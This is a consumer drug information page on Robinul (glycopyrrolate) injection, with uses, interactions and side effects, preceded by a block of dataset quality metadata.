"red_pajama_v2": {
"ccnet_original_length": 41658,
"ccnet_original_nlines": 270,
"rps_doc_curly_bracket": 0,
"rps_doc_ldnoobw_words": 0,
"rps_doc_lorem_ipsum": 0,
"rps_doc_stop_word_fraction": 0.24924561381340027,
"rps_doc_ut1_blacklist": 0,
"rps_doc_frac_all_caps_words": 0.04888352006673813,
"rps_doc_frac_lines_end_with_ellipsis": 0,
"rps_doc_frac_no_alph_words": 0.2907664477825165,
"rps_doc_frac_unique_words": 0.2810855209827423,
"rps_doc_mean_word_length": 5.505920886993408,
"rps_doc_num_sentences": 564,
"rps_doc_symbol_to_word_ratio": 0.00012070000229869038,
"rps_doc_unigram_entropy": 6.2300214767456055,
"rps_doc_word_count": 6080,
"rps_doc_frac_chars_dupe_10grams": 0.0765623077750206,
"rps_doc_frac_chars_dupe_5grams": 0.17935237288475037,
"rps_doc_frac_chars_dupe_6grams": 0.13624686002731323,
"rps_doc_frac_chars_dupe_7grams": 0.10529931634664536,
"rps_doc_frac_chars_dupe_8grams": 0.08704744279384613,
"rps_doc_frac_chars_dupe_9grams": 0.07772733271121979,
"rps_doc_frac_chars_top_2gram": 0.012695659883320332,
"rps_doc_frac_chars_top_3gram": 0.012904769740998745,
"rps_doc_frac_chars_top_4gram": 0.014338630251586437,
"rps_doc_books_importance": -2850.119384765625,
"rps_doc_books_importance_length_correction": -2850.119384765625,
"rps_doc_openwebtext_importance": -1677.703125,
"rps_doc_openwebtext_importance_length_correction": -1677.703125,
"rps_doc_wikipedia_importance": -883.3453979492188,
"rps_doc_wikipedia_importance_length_correction": -883.3453979492188
},
"fasttext": {
"dclm": 0.03295654058456421,
"english": 0.8929227590560913,
"fineweb_edu_approx": 2.657991409301758,
"eai_general_math": 0.3740693926811218,
"eai_open_web_math": 0.23922842741012573,
"eai_web_code": 0.009260829538106918
}
}
|
{
"free_decimal_correspondence": {
"primary": {
"code": "612.8",
"labels": {
"level_1": "Industrial arts, Technology, and Engineering",
"level_2": "Medicine",
"level_3": "Physiology"
}
},
"secondary": {
"code": "572.888",
"labels": {
"level_1": "Science and Natural history",
"level_2": "Biology and Anthropology",
"level_3": "Anthropology"
}
}
},
"bloom_cognitive_process": {
"primary": {
"code": "4",
"label": "Analyze"
},
"secondary": {
"code": "5",
"label": "Evaluate"
}
},
"bloom_knowledge_domain": {
"primary": {
"code": "2",
"label": "Conceptual"
},
"secondary": {
"code": "3",
"label": "Procedural"
}
},
"document_type_v1": {
"primary": {
"code": "2",
"label": "Academic/Research"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"extraction_artifacts": {
"primary": {
"code": "3",
"label": "Irrelevant Content"
},
"secondary": {
"code": "0",
"label": "No Artifacts"
}
},
"missing_content": {
"primary": {
"code": "4",
"label": "Missing Images or Figures"
},
"secondary": {
"code": "0",
"label": "No missing content"
}
},
"document_type_v2": {
"primary": {
"code": "3",
"label": "Academic Writing"
},
"secondary": {
"code": "8",
"label": "Documentation"
}
},
"reasoning_depth": {
"primary": {
"code": "4",
"label": "Advanced Reasoning"
},
"secondary": {
"code": "3",
"label": "Intermediate Reasoning"
}
},
"technical_correctness": {
"primary": {
"code": "4",
"label": "Highly Correct"
},
"secondary": {
"code": "3",
"label": "Mostly Correct"
}
},
"education_level": {
"primary": {
"code": "4",
"label": "Graduate/Expert Level"
},
"secondary": {
"code": "3",
"label": "Undergraduate Level"
}
}
}
|
71f077df794da2774531b20248bb19b0
|
2,211,226,314,340,981,500
|
January 7, 2022
Three Days To Bettering The best way You Minecraft Server Hosting
However a relatively new providing from Windows Azure is IaaS - Infrastructure as a Service - which includes virtual machine internet hosting. Being a Microsoft Home windows Azure Insider, it naturally occurred to me that an infrastructure optimal for this kind of shared entry is Home windows Azure. Home windows Azure has numerous capabilities, including shared host roles, storage, entry management, and what is generally referred to as PaaS - Platform as a Service. Utilizing the forge table, you'll be able to improve any diamond armor set merchandise or instrument, together with the diamond sword. On the Windows release, anyone can play with players on other devices including Xbox, Android, IOS and the Nintendo Swap in June. Studying how to create a Minecraft server on Raspberry Pi provides you with a world that you could entry from any machine operating Minecraft, except, curiously, MinecraftPi. For those who don’t have a screaming-quick internet connection, or bandwidth limitations on your connection, you possibly can really be setting up an unusable server. Memory Split. Change the setting to 16MB. This can free more memory assets for the server. The Raspberry Pi four is offered in different reminiscence configurations all the way up to eight GB.
It's best to now see drop-down menus accessible regarding memory. Now the query may pop up on your thoughts why do we want a free Minecraft server hosting games like digital Lego? Now FigurePrints is recreating Minecraft worlds. Of course what comes next is “Dad, can my associates hook up with my Minecraft server? You'll be able to spin it down when you are finished. This can be set to “true” or “false”, and is used to manage the flexibility of all gamers on the server to make use of cheat commands. All of the above, when used with a distant SSH connection, will allow you to arrange a Minecraft server on your Raspberry Pi. You should use wireless networking, however a quicker connection means superior server provision and higher in-game performance. For the Pi 3, definitely don't attempt to host more than 10. When you plan to put in Minecraft server on Raspberry Pi 4, you can host extra players relying on the choice of RAM. Mineplex is occupied by tons of of gamers each time. If you happen to intend to run a trial and there isn't any possibility of more variety of gamers becoming a member of the server then you can at all times choose from fashionable Linux VPS internet hosting plans as they are amongst essentially the most lightweight options.
You can get that right here. Ought to you might have any more questions about this, we have now a video tutorial which it's possible you'll take a look at right here. The more I believe about this, although, the extra I like the thought. Though earlier Pi models can be utilized for this, the results aren't as good. ealatorre AHH, lastly, an excellent cause to get going with Azure VM's! One really good one is Minecraft Servers. So, versions of Minecraft on a Home windows Pc, recreation console, Android, iOS, and Amazon Fire tablets and Television units will work with this server. As such, in case you have a number of devices on your local community, these could all entry the Minecraft server. Subsequent, configure the Raspberry Pi OS environment for working the Minecraft server. You could possibly take a look at Block Story, which is the right mix of Minecraft with an RPG. That wasn't too tough, and once more dozens of tutorials are on the market to help stroll you thru the process. The server has an IP handle, however it is only given out to people who have been invited to the server. The site has since expanded to turn into a place the place individuals share cooking classes, stream journey experiences and simply chat, although gaming remains a huge draw.
Note that the system spec of the Raspberry Pi means that you will not have the ability to host too many people. They've created a scenario wherein publishers can outsource QA testing to the individuals who care most about their titles and force these individuals to pay for the privilege. You can get a SSD setup on a Pi for less than most Micro SD cards cost. 1 hottest SSD among the many Pi group! When choosing ElixirNode as your Minecraft server hosting provider, you don't simply get the most effective Minecraft server hosting attainable, you also get to affix our tightly-knit neighborhood of Minecraft server owners. This is a good starter server for younger players. Loads of players see caves as a boring area in the previous model, that would simply be improved in new update. Players in the world will not must re-enter their Join Code, however any new players must use the new Be part of Code. All proper, let's get to the large criticism that commenters appear to have about Trove, which is its similar appearance to Cube World. In brief, you may want the principle Minecraft open world game from Mojang.
|
{
"url": "https://zenwriting.net/bassfarmer62/three-days-to-bettering-the-best-way-you-minecraft-server-hosting",
"source_domain": "zenwriting.net",
"snapshot_id": "crawl=CC-MAIN-2022-49",
"warc_metadata": {
"Content-Length": "8960",
"Content-Type": "application/http; msgtype=response",
"WARC-Block-Digest": "sha1:QTIIED3IGFBNVMPMEC7AJSSFIZJFGGV2",
"WARC-Concurrent-To": "<urn:uuid:c3f20ed7-d6b8-4d80-a1b5-7aa2119581cf>",
"WARC-Date": "2022-12-07T05:46:14Z",
"WARC-IP-Address": "172.67.151.71",
"WARC-Identified-Payload-Type": "application/xhtml+xml",
"WARC-Payload-Digest": "sha1:HY45V4M3FPRGDF37MATNWE4NNUL37SJP",
"WARC-Record-ID": "<urn:uuid:16b543e9-8602-4dfe-871f-2eced31235e5>",
"WARC-Target-URI": "https://zenwriting.net/bassfarmer62/three-days-to-bettering-the-best-way-you-minecraft-server-hosting",
"WARC-Truncated": null,
"WARC-Type": "response",
"WARC-Warcinfo-ID": "<urn:uuid:34962f80-a6a5-41d3-bc8c-5f893ea028ea>"
},
"warc_info": "isPartOf: CC-MAIN-2022-49\r\npublisher: Common Crawl\r\ndescription: Wide crawl of the web for November/December 2022\r\noperator: Common Crawl Admin ([email protected])\r\nhostname: ip-10-67-67-70\r\nsoftware: Apache Nutch 1.19 (modified, https://github.com/commoncrawl/nutch/)\r\nrobots: checked via crawler-commons 1.4-SNAPSHOT (https://github.com/crawler-commons/crawler-commons)\r\nformat: WARC File Format 1.1\r\nconformsTo: https://iipc.github.io/warc-specifications/specifications/warc-format/warc-1.1/"
}
|
{
"line_start_idx": [
0,
16,
17,
83,
84,
1354,
1355,
2620,
2621,
3898,
3899
],
"line_end_idx": [
16,
17,
83,
84,
1354,
1355,
2620,
2621,
3898,
3899,
5017
]
}
|
{
"red_pajama_v2": {
"ccnet_original_length": 5017,
"ccnet_original_nlines": 10,
"rps_doc_curly_bracket": 0,
"rps_doc_ldnoobw_words": 0,
"rps_doc_lorem_ipsum": 0,
"rps_doc_stop_word_fraction": 0.4374374449253082,
"rps_doc_ut1_blacklist": 0,
"rps_doc_frac_all_caps_words": 0.017017019912600517,
"rps_doc_frac_lines_end_with_ellipsis": 0,
"rps_doc_frac_no_alph_words": 0.12712712585926056,
"rps_doc_frac_unique_words": 0.4761350452899933,
"rps_doc_mean_word_length": 4.697322368621826,
"rps_doc_num_sentences": 46,
"rps_doc_symbol_to_word_ratio": 0,
"rps_doc_unigram_entropy": 5.416370391845703,
"rps_doc_word_count": 859,
"rps_doc_frac_chars_dupe_10grams": 0,
"rps_doc_frac_chars_dupe_5grams": 0.013878559693694115,
"rps_doc_frac_chars_dupe_6grams": 0,
"rps_doc_frac_chars_dupe_7grams": 0,
"rps_doc_frac_chars_dupe_8grams": 0,
"rps_doc_frac_chars_dupe_9grams": 0,
"rps_doc_frac_chars_top_2gram": 0.04089219123125076,
"rps_doc_frac_chars_top_3gram": 0.02180917002260685,
"rps_doc_frac_chars_top_4gram": 0.006443620193749666,
"rps_doc_books_importance": -390.6639099121094,
"rps_doc_books_importance_length_correction": -390.6639099121094,
"rps_doc_openwebtext_importance": -290.0254821777344,
"rps_doc_openwebtext_importance_length_correction": -290.0254821777344,
"rps_doc_wikipedia_importance": -206.08921813964844,
"rps_doc_wikipedia_importance_length_correction": -206.08921813964844
},
"fasttext": {
"dclm": 0.0476493202149868,
"english": 0.9481533765792847,
"fineweb_edu_approx": 1.6050138473510742,
"eai_general_math": 0.11986864358186722,
"eai_open_web_math": 0.24142473936080933,
"eai_web_code": 0.023357389494776726
}
}
|
{
"free_decimal_correspondence": {
"primary": {
"code": "004.0285",
"labels": {
"level_1": "General works, books and libraries, information sciences",
"level_2": "",
"level_3": "Computers and Computer science"
}
},
"secondary": {
"code": "005.457",
"labels": {
"level_1": "General works, books and libraries, information sciences",
"level_2": "",
"level_3": "Computer programming"
}
}
},
"bloom_cognitive_process": {
"primary": {
"code": "3",
"label": "Apply"
},
"secondary": {
"code": "2",
"label": "Understand"
}
},
"bloom_knowledge_domain": {
"primary": {
"code": "3",
"label": "Procedural"
},
"secondary": {
"code": "2",
"label": "Conceptual"
}
},
"document_type_v1": {
"primary": {
"code": "3",
"label": "Reference/Encyclopedic/Educational"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"extraction_artifacts": {
"primary": {
"code": "0",
"label": "No Artifacts"
},
"secondary": {
"code": "3",
"label": "Irrelevant Content"
}
},
"missing_content": {
"primary": {
"code": "0",
"label": "No missing content"
},
"secondary": {
"code": "2",
"label": "Click Here References"
}
},
"document_type_v2": {
"primary": {
"code": "23",
"label": "Tutorial"
},
"secondary": {
"code": "10",
"label": "Knowledge Article"
}
},
"reasoning_depth": {
"primary": {
"code": "2",
"label": "Basic Reasoning"
},
"secondary": {
"code": "3",
"label": "Intermediate Reasoning"
}
},
"technical_correctness": {
"primary": {
"code": "3",
"label": "Mostly Correct"
},
"secondary": {
"code": "4",
"label": "Highly Correct"
}
},
"education_level": {
"primary": {
"code": "2",
"label": "High School Level"
},
"secondary": {
"code": "1",
"label": "General Audience"
}
}
}
|
71f077df794da2774531b20248bb19b0
|
-6,660,415,963,130,540,000
|
• Masahiro Yamada's avatar
flash: complete CONFIG_SYS_NO_FLASH move with renaming · e856bdcf
Masahiro Yamada authored
We repeated partial moves for CONFIG_SYS_NO_FLASH, but this is
not completed. Finish this work by the tool.
During this move, let's rename it to CONFIG_MTD_NOR_FLASH.
Actually, we have more instances of "#ifndef CONFIG_SYS_NO_FLASH"
than those of "#ifdef CONFIG_SYS_NO_FLASH". Flipping the logic will
make the code more readable. Besides, negative meaning symbols do
not fit in obj-$(CONFIG_...) style Makefiles.
This commit was created as follows:
[1] Edit "default n" to "default y" in the config entry in
common/Kconfig.
[2] Run "tools/moveconfig.py -y -r HEAD SYS_NO_FLASH"
[3] Rename the instances in defconfigs by the following:
find . -path './configs/*_defconfig' | xargs sed -i \
-e '/CONFIG_SYS_NO_FLASH=y/d' \
-e 's/# CONFIG_SYS_NO_FLASH is not set/CONFIG_MTD_NOR_FLASH=y/'
[4] Change the conditionals by the following:
find . -name '*.[ch]' | xargs sed -i \
-e 's/ifndef CONFIG_SYS_NO_FLASH/ifdef CONFIG_MTD_NOR_FLASH/' \
-e 's/ifdef CONFIG_SYS_NO_FLASH/ifndef CONFIG_MTD_NOR_FLASH/' \
-e 's/!defined(CONFIG_SYS_NO_FLASH)/defined(CONFIG_MTD_NOR_FLASH)/' \
-e 's/defined(CONFIG_SYS_NO_FLASH)/!defined(CONFIG_MTD_NOR_FLASH)/'
[5] Modify the following manually
- Rename the rest of instances
- Remove the description from README
- Create the new Kconfig entry in drivers/mtd/Kconfig
- Remove the old Kconfig entry from common/Kconfig
- Remove the garbage comments from include/configs/*.h
Signed-off-by: default avatarMasahiro Yamada <[email protected]>
e856bdcf
M5253DEMO_defconfig 279 Bytes
|
{
"url": "https://source.puri.sm/Librem5/uboot-imx/-/blob/e856bdcfb49291d30b19603fc101bea096c48196/configs/M5253DEMO_defconfig",
"source_domain": "source.puri.sm",
"snapshot_id": "crawl=CC-MAIN-2020-50",
"warc_metadata": {
"Content-Length": "38051",
"Content-Type": "application/http; msgtype=response",
"WARC-Block-Digest": "sha1:RA5UW46J6T4VZVOYEC3WZJFFN25TYD3R",
"WARC-Concurrent-To": "<urn:uuid:503c0c18-80b8-47e5-9448-5ba76492b459>",
"WARC-Date": "2020-12-04T13:30:43Z",
"WARC-IP-Address": "178.63.173.204",
"WARC-Identified-Payload-Type": "text/html",
"WARC-Payload-Digest": "sha1:DRTTIZEJL7LEDAKJ7RGWMPBCD7DTRQ3E",
"WARC-Record-ID": "<urn:uuid:4900600c-2719-4f47-828a-1318e715af97>",
"WARC-Target-URI": "https://source.puri.sm/Librem5/uboot-imx/-/blob/e856bdcfb49291d30b19603fc101bea096c48196/configs/M5253DEMO_defconfig",
"WARC-Truncated": null,
"WARC-Type": "response",
"WARC-Warcinfo-ID": "<urn:uuid:822bdf37-1afc-4f13-bf8b-535b0bc2bb80>"
},
"warc_info": "isPartOf: CC-MAIN-2020-50\r\npublisher: Common Crawl\r\ndescription: Wide crawl of the web for November/December 2020\r\noperator: Common Crawl Admin ([email protected])\r\nhostname: ip-10-67-67-245.ec2.internal\r\nsoftware: Apache Nutch 1.17 (modified, https://github.com/commoncrawl/nutch/)\r\nrobots: checked via crawler-commons 1.2-SNAPSHOT (https://github.com/crawler-commons/crawler-commons)\r\nformat: WARC File Format 1.1\r\nconformsTo: http://iipc.github.io/warc-specifications/specifications/warc-format/warc-1.1/"
}
|
{
"line_start_idx": [
0,
29,
99,
128,
195,
244,
249,
312,
382,
455,
526,
576,
581,
621,
626,
689,
713,
718,
776,
781,
842,
902,
940,
1010,
1015,
1065,
1110,
1180,
1250,
1326,
1400,
1405,
1443,
1480,
1523,
1583,
1640,
1701,
1782,
1795
],
"line_end_idx": [
29,
99,
128,
195,
244,
249,
312,
382,
455,
526,
576,
581,
621,
626,
689,
713,
718,
776,
781,
842,
902,
940,
1010,
1015,
1065,
1110,
1180,
1250,
1326,
1400,
1405,
1443,
1480,
1523,
1583,
1640,
1701,
1782,
1795,
1824
]
}
|
{
"red_pajama_v2": {
"ccnet_original_length": 1824,
"ccnet_original_nlines": 39,
"rps_doc_curly_bracket": 0,
"rps_doc_ldnoobw_words": 0,
"rps_doc_lorem_ipsum": 0,
"rps_doc_stop_word_fraction": 0.25368732213974,
"rps_doc_ut1_blacklist": 0,
"rps_doc_frac_all_caps_words": 0.05899704992771149,
"rps_doc_frac_lines_end_with_ellipsis": 0,
"rps_doc_frac_no_alph_words": 0.36283186078071594,
"rps_doc_frac_unique_words": 0.6492146849632263,
"rps_doc_mean_word_length": 6.429319381713867,
"rps_doc_num_sentences": 19,
"rps_doc_symbol_to_word_ratio": 0.011799409985542297,
"rps_doc_unigram_entropy": 4.583311080932617,
"rps_doc_word_count": 191,
"rps_doc_frac_chars_dupe_10grams": 0,
"rps_doc_frac_chars_dupe_5grams": 0,
"rps_doc_frac_chars_dupe_6grams": 0,
"rps_doc_frac_chars_dupe_7grams": 0,
"rps_doc_frac_chars_dupe_8grams": 0,
"rps_doc_frac_chars_dupe_9grams": 0,
"rps_doc_frac_chars_top_2gram": 0.012214980088174343,
"rps_doc_frac_chars_top_3gram": 0.022801300510764122,
"rps_doc_frac_chars_top_4gram": 0.02931595966219902,
"rps_doc_books_importance": -119.33316040039062,
"rps_doc_books_importance_length_correction": -117.22161865234375,
"rps_doc_openwebtext_importance": -86.35930633544922,
"rps_doc_openwebtext_importance_length_correction": -86.35930633544922,
"rps_doc_wikipedia_importance": -74.25975799560547,
"rps_doc_wikipedia_importance_length_correction": -74.2479248046875
},
"fasttext": {
"dclm": 0.025782110169529915,
"english": 0.5472545623779297,
"fineweb_edu_approx": 1.7315462827682495,
"eai_general_math": 0.2828589081764221,
"eai_open_web_math": 0.39541393518447876,
"eai_web_code": 0.5031810402870178
}
}
|
{
"free_decimal_correspondence": {
"primary": {
"code": "005.4",
"labels": {
"level_1": "General works, books and libraries, information sciences",
"level_2": "",
"level_3": "Computer programming"
}
},
"secondary": {
"code": "621.392",
"labels": {
"level_1": "Industrial arts, Technology, and Engineering",
"level_2": "Engineering",
"level_3": "Mechanical engineering and Machinery"
}
}
},
"bloom_cognitive_process": {
"primary": {
"code": "3",
"label": "Apply"
},
"secondary": {
"code": "4",
"label": "Analyze"
}
},
"bloom_knowledge_domain": {
"primary": {
"code": "3",
"label": "Procedural"
},
"secondary": {
"code": "2",
"label": "Conceptual"
}
},
"document_type_v1": {
"primary": {
"code": "4",
"label": "Code/Software"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"extraction_artifacts": {
"primary": {
"code": "0",
"label": "No Artifacts"
},
"secondary": {
"code": "3",
"label": "Irrelevant Content"
}
},
"missing_content": {
"primary": {
"code": "0",
"label": "No missing content"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"document_type_v2": {
"primary": {
"code": "8",
"label": "Documentation"
},
"secondary": {
"code": "21",
"label": "Customer Support"
}
},
"reasoning_depth": {
"primary": {
"code": "2",
"label": "Basic Reasoning"
},
"secondary": {
"code": "3",
"label": "Intermediate Reasoning"
}
},
"technical_correctness": {
"primary": {
"code": "4",
"label": "Highly Correct"
},
"secondary": {
"code": "3",
"label": "Mostly Correct"
}
},
"education_level": {
"primary": {
"code": "4",
"label": "Graduate/Expert Level"
},
"secondary": {
"code": "3",
"label": "Undergraduate Level"
}
}
}
|
71f077df794da2774531b20248bb19b0
|
1,913,214,208,830,301,200
|
Click Here to Start Increasing Your Metabolism and Losing Weight
Check
Waters Powerful Role in Healthy Brain Function
Are you worried about losing your memory? Learn why drinking fresh and pure water is a natural way to maintain healthy brain function throughout your life.
Waters Role in Functional Brain Function
Water plays a very important role in the diet and function of your body. Many parts of your brain draw a lot of their energy from water.
Water must be brought into your body in a natural, natural way, maximizing your weight in ounces every day.
Water is essential for energy production in cells and in your overall metabolism, and neurotransmission. Nerve transmission is highly dependent on water. A small stream of water, or a micro-stream runs along the length of your nerves. This stream applies neurotransmitters along the microtubules to the nerve endings.
When your body is dehydrated, nerve transmission is compromised and brain function decreases. Chronic nerve pain can only be the end result of chronic dehydration.
Many chronic and painful conditions, including arthritis and fibromyalgia, are often significantly reduced after adequate rehydration.
Another important consideration is that water actually holds your body cells together. Water keeps the cell membranes together by forming hydronium ions that make water sticky and help bind your cells together. This gives your cells a higher viscosity that helps increase the efficiency of proteins and enzymes.
In dehydrated cells, their metabolism is greatly reduced. Dehydration has a dramatic effect especially on sugar metabolism, immune system and detoxification. Dehydration greatly affects the movement of the lymph through the body and causes the lymph system to clog up and break down.
From the cellular point of view, the delivery of nutrients through the cell wall is done by water. Many deficiencies are often specific dehydration problems.
Dehydration is an important producer of free radicals in your body and hydration effectively removes free radicals faster than most other therapies. Fully hydrated body can reduce your need for antioxidant supplements.
Lung dehydration is considered an important factor in respiratory disease. Sometimes the most dramatic results can be found in asthma and chronic bronchitis with simple rehydration.
Dehydration is a major source of stress in the body and changes the amino acid balance. This can cause DNA damage during cell division which can lead to many diseases such as cancer and other cell mutation problems.
Water is an important energy conductor such as your meridian and chakra energy systems. When your body is dry, it's very difficult for energy-based therapies like acupunture, Reiki, Bowenwork® and BodyTalk (TM) to work.
Due to imbalances in the cellular environment many cells of the human body and brain tissue are dehydrated, despite drinking enough water. The BodyTalk system has specific procedures that address any underlying factors that may limit the absorption of water throughout your body.
------------------
No comments
|
{
"url": "http://www.dietodiet.com/2020/02/waters-powerful-role-in-healthy-brain.html",
"source_domain": "www.dietodiet.com",
"snapshot_id": "CC-MAIN-2024-18",
"warc_metadata": {
"Content-Length": "203460",
"Content-Type": "application/http; msgtype=response",
"WARC-Block-Digest": "sha1:YWUTBOAINT6MMLPFBMHCZDXDGERF4MUP",
"WARC-Concurrent-To": "<urn:uuid:9d12cdc5-3762-4fad-bc58-f5bef10ab27a>",
"WARC-Date": "2024-04-23T01:38:23Z",
"WARC-IP-Address": "172.253.63.121",
"WARC-Identified-Payload-Type": "application/xhtml+xml",
"WARC-Payload-Digest": "sha1:FB7AT5FBREM4MMQXLZIFQL45ETFPHPYU",
"WARC-Record-ID": "<urn:uuid:38d8e328-1e66-43d8-86dd-282517ceec1b>",
"WARC-Target-URI": "http://www.dietodiet.com/2020/02/waters-powerful-role-in-healthy-brain.html",
"WARC-Truncated": null,
"WARC-Type": "response",
"WARC-Warcinfo-ID": "<urn:uuid:776a574d-e708-4cce-ac1c-ffd6cfc09d9b>"
},
"warc_info": "isPartOf: CC-MAIN-2024-18\r\npublisher: Common Crawl\r\ndescription: Wide crawl of the web for April 2024\r\noperator: Common Crawl Admin ([email protected])\r\nhostname: ip-10-67-67-82\r\nsoftware: Apache Nutch 1.19 (modified, https://github.com/commoncrawl/nutch/)\r\nrobots: checked via crawler-commons 1.5-SNAPSHOT (https://github.com/crawler-commons/crawler-commons)\r\nformat: WARC File Format 1.1\r\nconformsTo: https://iipc.github.io/warc-specifications/specifications/warc-format/warc-1.1/"
}
|
{
"line_start_idx": [
0,
65,
66,
72,
73,
120,
121,
277,
278,
319,
320,
457,
458,
566,
567,
885,
886,
1050,
1051,
1186,
1187,
1499,
1500,
1784,
1785,
1943,
1944,
2163,
2164,
2346,
2562,
2563,
2783,
2784,
3064,
3065,
3066,
3067,
3086,
3087
],
"line_end_idx": [
65,
66,
72,
73,
120,
121,
277,
278,
319,
320,
457,
458,
566,
567,
885,
886,
1050,
1051,
1186,
1187,
1499,
1500,
1784,
1785,
1943,
1944,
2163,
2164,
2346,
2562,
2563,
2783,
2784,
3064,
3065,
3066,
3067,
3086,
3087,
3098
]
}
|
{
"red_pajama_v2": {
"ccnet_original_length": 3098,
"ccnet_original_nlines": 39,
"rps_doc_curly_bracket": 0,
"rps_doc_ldnoobw_words": 0,
"rps_doc_lorem_ipsum": 0,
"rps_doc_stop_word_fraction": 0.37735849618911743,
"rps_doc_ut1_blacklist": 0,
"rps_doc_frac_all_caps_words": 0.005660379771143198,
"rps_doc_frac_lines_end_with_ellipsis": 0,
"rps_doc_frac_no_alph_words": 0.09622641652822495,
"rps_doc_frac_unique_words": 0.5021008253097534,
"rps_doc_mean_word_length": 5.325630187988281,
"rps_doc_num_sentences": 31,
"rps_doc_symbol_to_word_ratio": 0,
"rps_doc_unigram_entropy": 4.9825520515441895,
"rps_doc_word_count": 476,
"rps_doc_frac_chars_dupe_10grams": 0,
"rps_doc_frac_chars_dupe_5grams": 0,
"rps_doc_frac_chars_dupe_6grams": 0,
"rps_doc_frac_chars_dupe_7grams": 0,
"rps_doc_frac_chars_dupe_8grams": 0,
"rps_doc_frac_chars_dupe_9grams": 0,
"rps_doc_frac_chars_top_2gram": 0.02209072932600975,
"rps_doc_frac_chars_top_3gram": 0.01577908918261528,
"rps_doc_frac_chars_top_4gram": 0.011045360006392002,
"rps_doc_books_importance": -252.36268615722656,
"rps_doc_books_importance_length_correction": -252.36268615722656,
"rps_doc_openwebtext_importance": -154.02178955078125,
"rps_doc_openwebtext_importance_length_correction": -154.02178955078125,
"rps_doc_wikipedia_importance": -98.99220275878906,
"rps_doc_wikipedia_importance_length_correction": -98.99220275878906
},
"fasttext": {
"dclm": 0.6175441741943359,
"english": 0.9511842727661133,
"fineweb_edu_approx": 3.239729642868042,
"eai_general_math": 0.04359233006834984,
"eai_open_web_math": 0.2196773886680603,
"eai_web_code": 0.0010167399886995554
}
}
|
{
"free_decimal_correspondence": {
"primary": {
"code": "613.2",
"labels": {
"level_1": "Industrial arts, Technology, and Engineering",
"level_2": "Medicine",
"level_3": "Health and Hygiene"
}
},
"secondary": {
"code": "612.82",
"labels": {
"level_1": "Industrial arts, Technology, and Engineering",
"level_2": "Medicine",
"level_3": "Physiology"
}
}
},
"bloom_cognitive_process": {
"primary": {
"code": "2",
"label": "Understand"
},
"secondary": {
"code": "3",
"label": "Apply"
}
},
"bloom_knowledge_domain": {
"primary": {
"code": "2",
"label": "Conceptual"
},
"secondary": {
"code": "3",
"label": "Procedural"
}
},
"document_type_v1": {
"primary": {
"code": "3",
"label": "Reference/Encyclopedic/Educational"
},
"secondary": {
"code": "6",
"label": "Promotional/Advertisement"
}
},
"extraction_artifacts": {
"primary": {
"code": "3",
"label": "Irrelevant Content"
},
"secondary": {
"code": "0",
"label": "No Artifacts"
}
},
"missing_content": {
"primary": {
"code": "2",
"label": "Click Here References"
},
"secondary": {
"code": "0",
"label": "No missing content"
}
},
"document_type_v2": {
"primary": {
"code": "10",
"label": "Knowledge Article"
},
"secondary": {
"code": "16",
"label": "Personal Blog"
}
},
"reasoning_depth": {
"primary": {
"code": "2",
"label": "Basic Reasoning"
},
"secondary": {
"code": "3",
"label": "Intermediate Reasoning"
}
},
"technical_correctness": {
"primary": {
"code": "3",
"label": "Mostly Correct"
},
"secondary": {
"code": "2",
"label": "Partially Correct"
}
},
"education_level": {
"primary": {
"code": "2",
"label": "High School Level"
},
"secondary": {
"code": "1",
"label": "General Audience"
}
}
}
|
71f077df794da2774531b20248bb19b0
|
2,679,082,653,673,193,500
|
Recommended Topic Related To:
Robinul
"FDA is recommending health care professionals discontinue prescribing and dispensing prescription combination drug products that contain more than 325 milligrams (mg) of acetaminophen per tablet, capsule or other dosage unit. There are no"...
Robinul
Robinul Side Effects Center
Medical Editor: John P. Cunha, DO, FACOEP
Robinul Injection (glycopyrrolate) helps to control conditions such as peptic ulcers that involve excessive stomach acid production. The injectable form of this drug is also used to reduce saliva, nasal, lung, and stomach secretions and to help control heart rate during surgery. It is a synthetic anticholinergic agent. This medication is available in generic form. Common side effects include drowsiness, dizziness, weakness, blurred vision, dry eyes, dry mouth, constipation, or abdominal bloating.
Robinul injection is administered intramuscularly (IM) or intravenously (IV), under a physician's supervision. Dose depends on the condition being treated. Robinul may interact with amantadine, quinidine, antihistamines, decongestants, appetite suppressants, phenothiazines, or antidepressants. Tell your doctor all prescription and over-the-counter medications you use. During pregnancy, Robinul should be used only when prescribed. It is unknown if this drug passes into breast milk. Consult your doctor before breast-feeding.
Our Robinul Injection (glycopyrrolate) Side Effects Drug Center provides a comprehensive view of available drug information on the potential side effects when taking this medication.
This is not a complete list of side effects and others may occur. Call your doctor for medical advice about side effects. You may report side effects to FDA at 1-800-FDA-1088.
What is Patient Information in Detail?
Easy-to-read and understand detailed drug information and pill images for the patient or caregiver from Cerner Multum.
Robinul in Detail - Patient Information: Side Effects
Get emergency medical help if you have any of these signs of an allergic reaction: hives; difficult breathing; swelling of your face, lips, tongue, or throat.
Stop using glycopyrrolate and call your doctor at once if you have a serious side effect such as:
• severe constipation, severe stomach pain and bloating;
• diarrhea (especially if you have a colostomy or ileostomy);
• feeling like you might pass out;
• feeling very thirsty or hot, being unable to urinate, heavy sweating, weak pulse, or hot and dry skin; or
• dry diapers, fussiness, or excessive crying in a child taking glycopyrrolate.
Less serious side effects may include:
• dry mouth;
• vomiting;
• mild constipation;
• stuffy nose, sinus pain; or
• flushing (warmth, redness, or tingly feeling).
This is not a complete list of side effects and others may occur. Call your doctor for medical advice about side effects. You may report side effects to FDA at 1-800-FDA-1088.
Read the entire detailed patient monograph for Robinul (Glycopyrrolate) »
What is Patient Information Overview?
A concise overview of the drug for the patient or caregiver from First DataBank.
Robinul Overview - Patient Information: Side Effects
SIDE EFFECTS: Drowsiness, dizziness, weakness, blurred vision, dry eyes, dry mouth, constipation, or abdominal bloating may occur. If any of these effects persist or worsen, tell your doctor or pharmacist promptly.
To relieve dry mouth, suck (sugarless) hard candy or ice chips, chew (sugarless) gum, drink water, or use a saliva substitute. To relieve dry eyes, consult your pharmacist for artificial tears or other eye lubricants.
To prevent constipation, eat a diet adequate in fiber, drink plenty of water, and exercise. Consult your pharmacist for help in selecting a laxative (such as a stimulant type with stool softener).
Remember that your doctor has prescribed this medication because he or she has judged that the benefit to you is greater than the risk of side effects. Many people using this medication do not have serious side effects.
